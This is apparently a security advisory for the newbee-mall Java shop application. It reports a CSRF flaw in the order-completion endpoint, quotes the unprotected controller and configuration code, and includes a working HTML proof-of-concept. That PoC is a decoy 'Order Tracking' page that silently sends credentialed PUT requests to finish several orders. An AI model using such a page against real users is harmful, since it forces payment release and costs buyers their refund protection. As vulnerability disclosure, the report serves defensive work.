CSRF Vulnerability in Order Completion

[flashzyc]

CSRF Vulnerability in Order Completion

Summary

A CSRF vulnerability exists in the order completion endpoint /orders/{orderNo}/finish. Attackers can force users to prematurely mark orders as completed before goods are received, leading to payment release and difficulty in refund claims.

Vulnerability Details

Configuration-Level Issue

File: src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/orders/**");
        // ❌ No CSRF protection mechanism
    }
}

Endpoint-Level Code Analysis

File: src/main/java/ltd/newbee/mall/controller/mall/OrderController.java (Lines 97-107)

@PutMapping("/orders/{orderNo}/finish")
@ResponseBody
public Result finishOrder(@PathVariable("orderNo") String orderNo, HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    // ❌ No CSRF token validation
    // ⚠️ Completes order without verification of actual delivery
    String finishOrderResult = newBeeMallOrderService.finishOrder(orderNo, user.getUserId());
    if (ServiceResultEnum.SUCCESS.getResult().equals(finishOrderResult)) {
        return ResultGenerator.genSuccessResult();
    } else {
        return ResultGenerator.genFailResult(finishOrderResult);
    }
}

Security Issues:

1. ❌ No CSRF token validation
2. ⚠️ No additional confirmation required for order completion
3. ⚠️ Premature completion releases payment to merchant

Proof of Concept (PoC)

<!DOCTYPE html>
<html>
<head>
    <title>Order Tracking System</title>
</head>
<body>
    <h2>📦 Tracking Your Delivery</h2>
    <p>Updating delivery status...</p>
    
    <script>
        // Finish multiple recent orders
        var orderNumbers = [
            '202602051645001',
            '202602051645002',
            '202602051645003'
        ];
        
        orderNumbers.forEach(function(orderNo) {
            fetch('http://localhost:28089/orders/' + orderNo + '/finish', {
                method: 'PUT',
                credentials: 'include'
            })
            .then(response => response.json())
            .then(data => console.log('Order ' + orderNo + ' completed'));
        });
        
        setTimeout(function() {
            document.body.innerHTML = '<h3>✅ Delivery status updated successfully!</h3>';
        }, 2000);
    </script>
</body>
</html>

Impact

Premature order completion and payment release - Users lose buyer protection and face difficulty obtaining refunds if goods are not received or are defective.

---

CVSS Score: 7.4 (High)